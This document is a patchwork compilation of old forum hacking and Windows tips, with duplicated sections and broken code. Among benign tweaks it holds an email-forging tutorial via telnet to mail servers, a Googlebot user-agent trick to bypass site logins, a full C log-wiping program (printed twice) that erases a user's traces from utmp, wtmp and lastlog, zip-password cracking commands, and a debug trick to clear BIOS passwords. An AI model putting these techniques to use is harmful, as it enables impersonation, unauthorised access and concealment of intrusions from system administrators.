    This is a Santa test.
    .
    250 Requested mail action okay, completed
    quit
    221 Service closing transmission channel
    Connection to host lost.
    The message then looks like:
    from:santa@deer.northpole.org
    Date: Mon, 21 Oct 2002 10:09:16 -0500
    Subject: Rudolf
    This is a Santa test.
    The trick is to start each line you want in the headers with one word
    followed by a colon, and the a line followed by "return". As soon as
    you write a line that doesn't begin this way, the rest of what you
    type goes into the body of the email.
    Notice that the santa@northpole.com from the "mail from:" command didn't show up in the header. Some mail servers would show both "from" addresses.
    You can forge email on techbroker.com within one strict limitation.
    Your email has to go to someone at techbroker.com. If you can find any way to send email to someone outside techbroker, let us know, because you will have broken our security, muhahaha! Don't worry, you have my permission.
    Next, you can read the email you forge on techbroker.com via telnet:
    C:\>telnet techbroker.com 110
    +OK <30961.5910984301@techbroker.com> service ready
    Give this command:
    user xyz
    +OK user is known
    Then type in this:
    pass test
    +OK mail drop has 2 message(s)
    retr 1
    +OK message follows
    This is a test.
    If you want to know all possible commands, give this command:
    help
    +OK help list follows
    USER user
    PASS password
    STAT
    LIST [message]
    RETR message
    DELE message
    NOOP
    RSET
    QUIT
    APOP user md5
    TOP message lines
    UIDL [message]
    HELP
    Unless you use a weird online provider like AOL, you can use these
    same tricks to send and receive your own email. Or you can forge email to a friend by telnetting to his or her online provider's email
    sending computer(s).

    Free Access To Websites Without Registering

    Free Access To Websites Without Registering

    Go to

    -http://bugmenot.com/

    and type the URL of the website you want to log into.
    Examples:

    -http://www.nytimes.com/, -http://www.winnetmag.com/
    etcetera.

    Another (and better) way is changing the user agent of your browser to:
    Googlebot/2.1+

    -http://www.googlebot.com/bot.html

    This is very easy in Mozilla's Firefox. Download and install the User Agent Switcher from

    -http://www.chrispederick.com/work/firefox/useragentswitcher/
    and add the Googlebot user agent.

    Have fun, Dead Dreamer!

    -]Edit[- Now this was just browsing entire forum without even needing to login to view restricted areas, and it works on other sites
    And no, you cant access the hidden forums either, already tried that

    Erasing Your Presence From System Logs On Linux

    Erasing Your Presence From System Logs



    Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



    Example:



    #include

    #include

    #include

    #include

    #include

    #include

    #include

    #include

    #define WTMP_NAME "/usr/adm/wtmp"

    #define UTMP_NAME "/etc/utmp"

    #define LASTLOG_NAME "/usr/adm/lastlog"



    int f;



    void kill_utmp(who)

    char *who;

    {

    struct utmp utmp_ent;



    if ((f=open(UTMP_NAME,O_RDWR))>=0) {

    while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

    bzero((char *)&utmp_ent,sizeof( utmp_ent ));

    lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

    write (f, &utmp_ent, sizeof (utmp_ent));

    }

    close(f);

    }

    }



    void kill_wtmp(who)

    char *who;

    {

    struct utmp utmp_ent;

    long pos;



    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {



    while(pos != -1L) {

    lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

    if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

    pos = -1L;

    } else {

    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

    bzero((char *)&utmp_ent,sizeof(struct utmp ));

    lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

    write (f, &utmp_ent, sizeof (utmp_ent));

    pos = -1L;

    } else pos += 1L;

    }

    }

    close(f);

    }

    }



    void kill_lastlog(who)

    char *who;

    {

    struct passwd *pwd;

    struct lastlog newll;



    if ((pwd=getpwnam(who))!=NULL) {



    if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

    lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

    bzero((char *)&newll,sizeof( newll ));

    write(f, (char *)&newll, sizeof( newll ));

    close(f);

    }



    } else printf("%s: ?\n",who);

    }



    main(argc,argv)

    int argc;

    char *argv[];

    {

    if (argc==2) {

    kill_lastlog(argv[1]);

    kill_wtmp(argv[1]);

    kill_utmp(argv[1]);

    printf("Zap2!\n");

    } else

    printf("Error.\n");

    }

    Erasing Your Presence From System Logs

    Erasing Your Presence From System Logs



    Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



    Example:



    #include

    #include

    #include

    #include

    #include

    #include

    #include

    #include

    #define WTMP_NAME "/usr/adm/wtmp"

    #define UTMP_NAME "/etc/utmp"

    #define LASTLOG_NAME "/usr/adm/lastlog"



    int f;



    void kill_utmp(who)

    char *who;

    {

    struct utmp utmp_ent;



    if ((f=open(UTMP_NAME,O_RDWR))>=0) {

    while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

    bzero((char *)&utmp_ent,sizeof( utmp_ent ));

    lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

    write (f, &utmp_ent, sizeof (utmp_ent));

    }

    close(f);

    }

    }



    void kill_wtmp(who)

    char *who;

    {

    struct utmp utmp_ent;

    long pos;



    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {



    while(pos != -1L) {

    lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

    if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

    pos = -1L;

    } else {

    if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

    bzero((char *)&utmp_ent,sizeof(struct utmp ));

    lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

    write (f, &utmp_ent, sizeof (utmp_ent));

    pos = -1L;

    } else pos += 1L;

    }

    }

    close(f);

    }

    }



    void kill_lastlog(who)

    char *who;

    {

    struct passwd *pwd;

    struct lastlog newll;



    if ((pwd=getpwnam(who))!=NULL) {



    if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

    lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

    bzero((char *)&newll,sizeof( newll ));

    write(f, (char *)&newll, sizeof( newll ));

    close(f);

    }



    } else printf("%s: ?\n",who);

    }



    main(argc,argv)

    int argc;

    char *argv[];

    {

    if (argc==2) {

    kill_lastlog(argv[1]);

    kill_wtmp(argv[1]);

    kill_utmp(argv[1]);

    printf("Zap2!\n");

    } else

    printf("Error.\n");

    }

    Disable Windows Logo Key

    Disable Windows Logo Key

    I was recently playing games and this nasty windos logo key keep annoying me , cause i often accidently clicked it , and i start to search a solution to solve my problem, and researched the following way and it did work, hope this helps, thanks!



    u can copy the following messages into ur notepad and save as *.reg, and use it..

    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]
    "Scancode Map"=hex:00,00,00,00,00,00,00,00,03,00,00,00,00,00,5b,e0,00,00,5c,e0,\
    00,00,00,00

    Disable The Send Error Report to Microsoft

    To disable the feature in WinXP which tries to send a report to microsoft every time a program crashes this sensitive information is very valuable for the hackers so disable it, you will have to do this:

    *************************************************************************

    Open Control Panel
    Click on Preformance and Maintenance.
    Click on System.
    Then click on the Advanced tab
    Click on the error reporting button on the bottom of the windows.
    Select Disable error reporting.
    Click OK
    Click OK

    *************************************************************************

    Disable Compression On Windows Xp NTFS partition Disk Cleanup

    Disable Compression On Windows Xp NTFS partition Disk Cleanup

    On an NTFS partition, Disk Cleanup can compress old files
    to save space. But calculating the savings and performing
    the compression often take a long time, and on some systems,
    Disk Cleanup hangs during the process. If that happens, or if
    you don't care to wait, use this Registry tweak to disable the
    compression: Delete the key
    HKEY_ LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\VolumeCaches\Compress Old Files.

    Delete An undeletable File

    Delete An undeletable File.txt

    Open a Command Prompt window and leave it open.
    Close all open programs.
    Click Start, Run and enter TASKMGR.EXE
    Go to the Processes tab and End Process on Explorer.exe.
    Leave Task Manager open.
    Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
    At the command prompt type DEL where is the file you wish to delete.
    Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
    Close Task Manager.


    Or you can try this

    Open Notepad.exe

    Click File>Save As..>

    locate the folder where ur undeletable file is

    Choose 'All files' from the file type box

    click once on the file u wanna delete so its name appears in the 'filename' box

    put a " at the start and end of the filename
    (the filename should have the extension of the undeletable file so it will overwrite it)

    click save,

    It should ask u to overwrite the existing file, choose yes and u can delete it as normal


    Here's a manual way of doing it. I'll take this off once you put into your first post zain.

    1. Start
    2. Run
    3. Type: command
    4. To move into a directory type: cd c:\*** (The stars stand for your folder)
    5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
    6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
    7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

    Create Bootable XP SP integrated CD

    Slipstreaming Windows XP Service Pack 1a and Create Bootable CD

    Slipstreaming a Service Pack, is the process to integrate the Service Pack into the installation so that with every new installation the Operating System and Service Pack are installed at the same time.

    Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for the home user or small business user to do the same.

    Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)install your OS, you don't have to apply the Service Pack later, also if you update any Windows component later, you'll be sure that you get the correct installation files if Windows needs any.


    Slipstream Windows XP Service Pack 1a:
    CODE
    http://download.microsoft.com/download/5/4/f/54f8bcf8-bb4d-4613-8ee7-db69d01735ed/xpsp1a_en_x86.exe


    Download the (full) "Network Install" of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in my case D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.

    Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack does no longer include Microsoft's dated Java version. If you have already installed Windows XP SP1, there is no reason to install SP1a, but the "older" SP1 (with MS Java) is no longer available for download.

    Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in that folder.

    Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Start > Run > cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command: servicepack filename -x. A small window will appear, and you need to point it to the folder where you want to extract the SP1 files. Click Ok to start extracting the SP1a files.

    Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:path to WinXP CD files. In my example the command is update /s:D:\XP-CD).

    Windows XP Update will do its thing:

    When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.

    It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.


    Creating a Bootable CD
    For this part I used ISO Buster
    CODE
    http://www.smart-projects.net/isobuster/

    and Nero Burning.

    Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the "folder" Bootable CD, and right-click Microsoft Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your Windows XP files (D:\XP-CD in my case).

    Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source of boot image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changing the Number of loaded sectors to 4 (otherwise it won't boot!)


    If you have an older version of Nero you won't have the option Do Not Add ";1" ISO file version extention under Relax ISO Restrictions. You won't be able to boot your new CD, so update Nero!
    You can configure the Label tab to your liking, I would however recommend that you keep the Volume Label the same as on your original Windows XP CD.

    Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.

    Next, burn your new CD.

    You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!

    Create A Personal Screen Saver In Win Xp

    This isnt a tweak, but a great little feature! For a great way to put your digital photos to work, try creating a slide show presentation for use as a screen saver. Here's how:

    1. Right-click an empty spot on your desktop and then click Properties.

    2. Click the Screen Saver tab.

    3. In the Screen saver list, click My Pictures Slideshow.

    4. Click Settings to make any adjustments, such as how often the pictures should change, what size they should be, and whether you'll use transition effects between pictures, and then click OK.

    Now your screen saver is a random display of the pictures taken from your My Pictures folder.

    How to set-up the firewall & Configure it

    Configuring Crap Software Pro


    --------------------------------------
    Configuring The Standard Settings

    Your first configuration should be this of Crap Software should be like this----

    Launch Crap Software Pro and click to highlight the "Overview"
    tab on the left hand side . In the pane that appears on the right
    hand side click the "Preferences" tab and in the section "Check for updates" check "Manually".

    In the "General" section you can also configure Crap Software to load at
    start up which is advisable because this software is your first line
    defence against uninvited invasion of your computer by a whole
    gamult of virus, spyware, adware and bots! Virus checking software
    does have its place but remember that prevention is always better
    than a cure!

    Crap Software Pro's program control is automatically configured.
    When you run it for the first time it will ask on behalf of programs
    installed on your system for permission to access the Internet.
    Your Browser will be the first to request - just tick the "Yes"
    box and the "Remember this setting" box and Crap Software will
    always allow your browser access automatically.

    Unless you use online databases etc., there should be no
    reason for any application other than a browser, email client, ftp client,
    streaming media player or a download manager to gain access to the Internet.

    So consider what type of program it is that needs Internet access
    before giving Crap Software permission to allow it. If it is just a driver file
    (.DLL) that requests Internet access, always search Windows to try
    and identify it. Many seudo-virii such as AdWare and sub class
    seven Trojans access the Internet from your system using .dll files.
    ----------------------------------------------

    Configuring The Advanced Settings

    If you are not on a LAN (connected to another computer in a network)
    you can use this guide to give your firewall some real muscle:

    Launch Crap Software Pro and click to highlight the "Firewall" tab on
    the left hand side . In the pane that appears on the right hand side
    in the section "Internet Zone Security" set the slider control to "High"
    Then click the "Custom" button in the same section.
    The next settings page is divided into two sections with tabs Internet
    Zone and Trusted Zone at the top of the page.

    Under the Internet Zone tab there is a list of settings that can
    be accessed by scrolling.

    At the top is the high security settings and the only thing that should
    check from there is "allow broadcast/multicast".
    The rest should be unchecked

    Scroll down until you get to the medium security settings area.
    Check all the boxes in this section until you get to "Block Incomming
    UDP Ports". When you check that you will be asked to supply
    a list of ports, and in the field at the bottom of the page enter
    1-65535

    Then go back to the list and check the box alongside "Block
    Outgoing UDP Ports" and at the bottom of the page enter
    1-19, 22-79, 82-7999, 8082-65535

    Repeat this proceedure for the following settings
    "Block Incomming TCP Ports": 1-65535
    "Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
    Then click "Apply", "Ok" at the bottom of the page.

    Back in the right hand "Firewall" pane go next to the yellow
    "Trusted Zone Security" section and set it to "high" with the slider.
    Click "Custom" and repeat the ABOVE proceedure this time choosing
    the *Trusted Zone* tab at the top of the settings page.

    These settings will stop all incoming packets at ports 1-65535
    and also block all pings, trojans etc. These settings will also stop all
    spyware or applications from phoning home from your drive without your knowledge!

    How to set-up the firewall Configure it

    Configuring Crap Software Pro
    --------------------------------------
    Configuring The Standard Settings

    Your first configuration should be this of Crap Software should be like this----

    Launch Crap Software Pro and click to highlight the "Overview"
    tab on the left hand side . In the pane that appears on the right
    hand side click the "Preferences" tab and in the section "Check for updates" check "Manually".

    In the "General" section you can also configure Crap Software to load at
    start up which is advisable because this software is your first line
    defence against uninvited invasion of your computer by a whole
    gamult of virii, spyware, adware and bots! Virus checking software
    does have its place but remember that prevention is always better
    than a cure!

    Crap Software Pro's program control is automatically configured.
    When you run it for the first time it will ask on behalf of programs
    installed on your system for permission to access the Internet.
    Your Browser will be the first to request - just tick the "Yes"
    box and the "Remember this setting" box and Crap Software will
    always allow your browser access automatically.

    Unless you use online databases etc., there should be no
    reason for any application other than a browser, email client, ftp client,
    streaming media player or a download manager to gain access to the Internet.

    So consider what type of program it is that needs Internet access
    before giving Crap Software permission to allow it. If it is just a driver file
    (.DLL) that requests Internet access, always search Windows to try
    and identify it. Many seudo-virii such as AdWare and sub class
    seven Trojans access the Internet from your system using .dll files.
    ----------------------------------------------

    Configuring The Advanced Settings

    If you are not on a LAN (connected to another computer in a network)
    you can use this guide to give your firewall some real muscle:

    Launch Crap Software Pro and click to highlight the "Firewall" tab on
    the left hand side . In the pane that appears on the right hand side
    in the section "Internet Zone Security" set the slider control to "High"
    Then click the "Custom" button in the same section.
    The next settings page is divided into two sections with tabs Internet
    Zone and Trusted Zone at the top of the page.

    Under the Internet Zone tab there is a list of settings that can
    be accessed by scrolling.

    At the top is the high security settings and the only thing that should
    check from there is "allow broadcast/multicast".
    The rest should be unchecked

    Scroll down until you get to the medium security settings area.
    Check all the boxes in this section until you get to "Block Incomming
    UDP Ports". When you check that you will be asked to supply
    a list of ports, and in the field at the bottom of the page enter
    1-65535

    Then go back to the list and check the box alongside "Block
    Outgoing UDP Ports" and at the bottom of the page enter
    1-19, 22-79, 82-7999, 8082-65535

    Repeat this proceedure for the following settings
    "Block Incomming TCP Ports": 1-65535
    "Block Outgoing TCP Ports": 1-19, 22-79, 82-7999, 8082-65535
    Then click "Apply", "Ok" at the bottom of the page.

    Back in the right hand "Firewall" pane go next to the yellow
    "Trusted Zone Security" section and set it to "high" with the slider.
    Click "Custom" and repeat the ABOVE proceedure this time choosing
    the *Trusted Zone* tab at the top of the settings page.

    These settings will stop all incoming packets at ports 1-65535
    and also block all pings, trojans etc. These settings will also stop all
    spyware or applications from phoning home from your drive without your knowledge!

    Get Back your Lost Zip Files Password

    Get Back your Lost Zip Files Password


    Tutorial On Getting Back your Lost Zip Files Password

    What is FZC? FZC is a program that cracks zip files (zip is a method of compressing multiple files into one smaller file) that are password-protected (which means you're gonna need a password to open the zip file and extract files out of it). You can get it anywhere - just use a search engine such as altavista.com.
    FZC uses multiple methods of cracking - bruteforce (guessing passwords systematically until the program gets it) or wordlist attacks (otherwise known as dictionary attacks. Instead of just guessing passwords systematically, the program takes passwords out of a "wordlist", which is a text file that contains possible passwords. You can get lots of wordlists at www.theargon.com.).
    FZC can be used in order to achieve two different goals: you can either use it to recover a lost zip password which you used to remember but somehow forgot, or to crack zip passwords which you're not supposed to have. So like every tool, this one can be used for good and for evil.
    The first thing I want to say is that reading this tutorial... is the easy way to learn how to use this program, but after reading this part of how to use the FZC you should go and check the texts that come with that program and read them all. You are also going to see the phrase "check name.txt" often in this text. These files should be in FZC's directory. They contain more information about FZC.
    FZC is a good password recovery tool, because it's very fast and also support resuming so you don't have to keep the computer turned on until you get the password, like it used to be some years ago with older cracking programs. You would probably always get the password unless the password is longer than 32 chars (a char is a character, which can be anything - a number, a lowercase or undercase letter or a symbol such as ! or &) because 32 chars is the maximum value that FZC will accept, but it doesn't really matter, because in order to bruteforce a password with 32 chars you'll need to be at least immortal..heehhe.. to see the time that FZC takes with bruteforce just open the Bforce.txt file, which contains such information.
    FZC supports brute-force attacks, as well as wordlist attacks. While brute-force attacks don't require you to have anything, wordlist attacks require you to have wordlists, which you can get from www.theargon.com. There are wordlists in various languages, various topics or just miscellaneous wordlists. The bigger the wordlist is, the more chances you have to crack the password.
    Now that you have a good wordlist, just get FZC working on the locked zip file, grab a drink, lie down and wait... and wait... and wait...and have good thoughts like "In wordlist mode I'm gonna get the password in minutes" or something like this... you start doing all this and remember "Hey this guy started with all this bullshit and didn't say how I can start a wordlist attack!..." So please wait just a little more, read this tutorial 'till the end and you can do all this "bullshit".

    We need to keep in mind that are some people might choose some really weird passwords (for example: 'e8t7@$^%*gfh), which are harder to crack and are certainly impossible to crack (unless you have some weird wordlist). If you have a bad luck and you got such a file, having a 200MB list won't help you anymore. Instead, you'll have to use a different type of attack. If you are a person that gives up at the first sign of failure, stop being like that or you won't get anywhere. What you need to do in such a situation is to put aside your sweet xxx MB's list and start using the Brute Force attack.
    If you have some sort of a really fast and new computer and you're afraid that you won't be able to use your computer's power to the fullest because the zip cracker doesn't support this kind of technology, it's your lucky day! FZC has multiple settings for all sorts of hardware, and will automatically select the best method.

    Now that we've gone through all the theoretical stuff, let's get to the actual commands.


    --------------------------------------------------------------------------------
    Bruteforce
    --------------------------------------------------------------------------------


    The command line you'll need to use for using brute force is:

    fzc -mb -nzFile.zip -lChr Lenght -cType of chars

    Now if you read the bforce.txt that comes with fzc you'll find the description of how works Chr Lenght and the Type of chars, but hey, I'm gonna explain this too. Why not, right?... (but remember look at the bforce.txt too)

    For Chr Lenght you can use 4 kind of switches...

    -> You can use range -> 4-6 :it would brute force from 4 Chr passwors to 6 chr passwords
    -> You can use just one lenght -> 5 :it would just brute force using passwords with 5 chars
    -> You can use also the all number -> 0 :it would start brute forcing from passwords with lenght 0 to lenght 32, even if you are crazy i don't think that you would do this.... if you are thinking in doing this get a live...
    -> You can use the + sign with a number -> 3+ :in this case it would brute force from passwords with lenght 3 to passwords with 32 chars of lenght, almost like the last option...

    For the Type of chars we have 5 switches they are:

    -> a for using lowercase letters
    -> A for using uppercase letters
    -> ! for using simbols (check the Bforce.txt if you want to see what simbols)
    -> s for using space
    -> 1 for using numbers


    Example:
    If you want to find a password with lowercase and numbers by brute force you would just do something like:

    fzc -mb -nzTest.zip -l4-7 -ca1

    This would try all combinations from passwords with 4 chars of lenght till 7 chars, but just using numbers and lowercase.

    *****
    hint
    *****

    You should never start the first brute force attack to a file using all the chars switches, first just try lowercase, then uppercase, then uppercase with number then lowercase with numbers, just do like this because you can get lucky and find the password much faster, if this doesn't work just prepare your brain and start with a brute force that would take a lot of time. With a combination like lowercase, uppercase, special chars and numbers.


    --------------------------------------------------------------------------------
    Wordlis
    --------------------------------------------------------------------------------

    Like I said in the bottom and like you should be thinking now, the wordlist is the most powerfull mode in this program. Using this mode, you can choose between 3 modes, where each one do some changes to the text that is in the wordlist, I'm not going to say what each mode does to the words, for knowing that just check the file wlist.txt, the only thing I'm going to tell you is that the best mode to get passwords is mode 3, but it takes longer time too.
    To start a wordlist attak you'll do something like.

    fzc -mwMode number -nzFile.zip -nwWordlist

    Where:

    Mode number is 1, 2 or 3 just check wlist.txt to see the changes in each mode.
    File.zip is the filename and Wordlist is the name of the wordlist that you want to use. Remember that if the file or the wordlist isn't in the same directory of FZC you'll need to give the all path.

    You can add other switches to that line like -fLine where you define in which line will FZC start reading, and the -lChar Length where it will just be read the words in that char length, the switche works like in bruteforce mode.
    So if you something like

    fzc -mw1 -nztest.zip -nwMywordlist.txt -f50 -l9+

    FZC would just start reading at line 50 and would just read with length >= to 9.

    Example:

    If you want to crack a file called myfile.zip using the "theargonlistserver1.txt" wordlist, selecting mode 3, and you wanted FZC to start reading at line 50 you would do:

    fzc -mw3 -nzmyfile.zip -nwtheargonlistserver1.txt -f50





    --------------------------------------------------------------------------------
    Resuming
    --------------------------------------------------------------------------------

    Other good feature in FZC is that FZC supports resuming. If you need to shutdown your computer and FZC is running you just need to press the ESC key, and fzc will stop. Now if you are using a brute force attack the current status will be saved in a file called resume.fzc but if you are using a wordlist it will say to you in what line it ended (you can find the line in the file fzc.log too).
    To resume the bruteforce attack you just need to do:

    fzc -mr

    And the bruteforce attack will start from the place where it stopped when you pressed the ESC key.
    But if you want to resume a wordlist attack you'll need to start a new wordlist attack, saying where it's gonna start. So if you ended the attack to the file.zip in line 100 using wordlist.txt in mode 3 to resume you'll type

    fzc -mw3 -nzfile.zip -nwwordlist.txt -f100

    Doing this FZC would start in line 100, since the others 99 lines where already checked in an earlier FZC session.


    Well, it looks like I covered most of what you need to know. I certainly hope it helped you... don't forget to read the files that come with the program

    The Best Way to Change Bios Password

    Here is the best way to change the bios password in win 95/98:

    Follow the steps below:

    1) Boot up windows.
    2) go to dos-prompt or go to command prompt directly from the windows start up menu.

    3) type the command at the prompt: "debug" (without quotes ninja.gif )
    4) type the following lines now exactly as given.......
    o 70 10
    o 71 20
    quit
    exit

    4) exit from the dos prompt and restart the machine


    password protection gone!!!!!!!!!!!!! biggrin.gif

    EnjoYYYYYYYYYY

    PS: I tested this in Award Bios........
    There seems to be some issue regarding display drivers on some machines if this is used. Just reinstall the drivers, Everything will be fine...........

    I have not found any other trouble if the codes are used.

    To be on safe side, just back up your data..........


    The use of this code is entirely at ur risk.......... It worked fine for me..........

    Use CMD Prompt to add to folder context menu Windows Xp

    add the open cmd prompt to folder context menus
    also drives and My Computer

    copy what's in the code area to notepad and save as cmd here.reg

    CODE

    Windows Registry Editor Version 5.00

    [HKEY_CLASSES_ROOT\Drive\shell\cmd]
    @="Command Prompt"

    [HKEY_CLASSES_ROOT\Drive\shell\cmd\command]
    @="cmd.exe /k \"cd %L\""

    [HKEY_CLASSES_ROOT\Directory\shell\cmd]
    @="Command Prompt"

    [HKEY_CLASSES_ROOT\Directory\shell\cmd\command]
    @="cmd.exe /k \"cd %L\""

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd]
    @="Command Prompt"

    [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\cmd\command]
    @="cmd.exe /k \"cd %L\""

    Check For Dos, Check to see if you are infected

    When you first turn on you computer (BEFORE DIALING INTO YOUR ISP),
    open a MS-DOS Prompt window (start/programs MS-DOS Prompt).
    Then type netstat -arn and press the Enter key.

    Your screen should display the following (without the dotted lines
    which I added for clarification).

    -----------------------------------------------------------------------------
    Active Routes:

    Network Address Netmask Gateway Address Interface Metric
    127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
    255.255.255.255 255.255.255.255 255.255.255.255 0.0.0.0 1

    Route Table

    Active Connections

    Proto Local Address Foreign Address State

    --------------------------------------------------------------------------------

    If you see anything else, there might be a problem (more on that later).
    Now dial into your ISP, once you are connected;
    go back to the MS-DOS Prompt and run the same command as before
    netstat -arn, this time it will look similar to the following (without
    dotted lines).

    -------------------------------------------------------------------------------------

    Active Routes:

    Network Address Netmask Gateway Address Interface Metric
    0.0.0.0 0.0.0.0 216.1.104.70 216.1.104.70 1
    127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
    216.1.104.0 255.255.255.0 216.1.104.70 216.1.104.70 1
    216.1.104.70 255.255.255.255 127.0.0.1 127.0.0.1 1
    216.1.104.255 255.255.255.255 216.1.104.70 216.1.104.70 1
    224.0.0.0 224.0.0.0 216.1.104.70 216.1.104.70 1
    255.255.255.255 255.255.255.255 216.1.104.70 216.1.104.70 1

    Route Table

    Active Connections

    Proto Local Address Foreign Address State
    TCP 0.0.0.0:0 0.0.0.0:0 LISTENING
    TCP 216.1.104.70:137 0.0.0.0:0 LISTENING
    TCP 216.1.104.70:138 0.0.0.0:0 LISTENING
    TCP 216.1.104.70:139 0.0.0.0:0 LISTENING
    UDP 216.1.104.70:137 *:*

    --------------------------------------------------------------------------------

    What you are seeing in the first section (Active Routes) under the heading of
    Network Address are some additional lines. The only ones that should be there
    are ones belonging to your ISP (more on that later). In the second section
    (Route Table) under Local Address you are seeing the IP address that your ISP
    assigned you (in this example 216.1.104.70).

    The numbers are divided into four dot notations, the first three should be
    the same for both sets, while in this case the .70 is the unique number
    assigned for THIS session. Next time you dial in that number will more than
    likely be different.

    To make sure that the first three notation are as they should be, we will run
    one more command from the MS-DOS window.
    From the MS-DOS Prompt type tracert /www.yourispwebsite.com or .net
    or whatever it ends in. Following is an example of the output you should see.

    ---------------------------------------------------------------------------------------

    Tracing route to /www.motion.net [207.239.117.112]over a maximum of 30 hops:
    1 128 ms 2084 ms 102 ms chat-port.motion.net [216.1.104.4]
    2 115 ms 188 ms 117 ms chat-core.motion.net [216.1.104.1]
    3 108 ms 116 ms 119 ms www.motion.net [207.239.117.112]
    Trace complete.

    ------------------------------------------------------------------------------------------

    You will see that on lines with the 1 and 2 the first three notations of the
    address match with what we saw above, which is a good thing. If it does not,
    then some further investigation is needed.

    If everything matches like above, you can almost breath easier. Another thing
    which should you should check is programs launched during startup. To find
    these, Click start/programs/startup, look at what shows up. You should be
    able to recognize everything there, if not, once again more investigation is
    needed.

    -------------------------------------------------------------------------------------------

    Now just because everything reported out like we expected (and demonstrated
    above) we still are not out of the woods. How is this so, you ask? Do you use
    Netmeeting? Do you get on IRC (Internet Relay Chat)? Or any other program
    that makes use of the Internet. Have you every recieved an email with an
    attachment that ended in .exe? The list goes on and on, basically anything
    that you run could have become infected with a trojan. What this means, is
    the program appears to do what you expect, but also does just a little more.
    This little more could be blasting ebay.com or one of the other sites that
    CNNlive was talking about.

    What can you do? Well some anti-virus software will detect some trojans.
    Another (tedious) thing is to start each of these "extra" Internet programs
    one at a time and go through the last two steps above, looking at the routes
    and connection the program uses. However, the tricky part will be figuring
    out where to tracert to in order to find out if the addresses you see in
    step 2 are "safe" or not. I should forewarn you, that running tracert after
    tracert, after tracert might be considered "improper" by your ISP. The steps
    outlined above may not work exactly as I have stated depending upon your ISP,
    but with a true ISP it should work. Finally, this advise comes with NO
    warranty and by following my "hints' you implicitly release me from ANY and
    ALL liability which you may incur.


    Other options

    Display protocol statistics and current TCP/IP network connections.
    Netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [intervals]

    -a.. Display all connections and listening ports.
    -e.. Display Ethernet statistics. This may be combined with the -s option.
    -n.. Diplays address and port numbers in the numerical form.
    -p proto..Shows connections for the protocol specified by proto; proto may be
    TCP or UDP. If used with the -s option to display per-protocol statistics,
    proto may be TCP, UDP, of IP.
    -r.. Display the routing table.
    -s.. Display per-protocol statistics. By default, statistics are shown for TCP
    UDP and IP; the -p option may be used to specify a subset of the default
    interval..Redisplay selected statistics, pausing intervals seconds between each
    display. If omitted. netstat will print the current configuration information
    once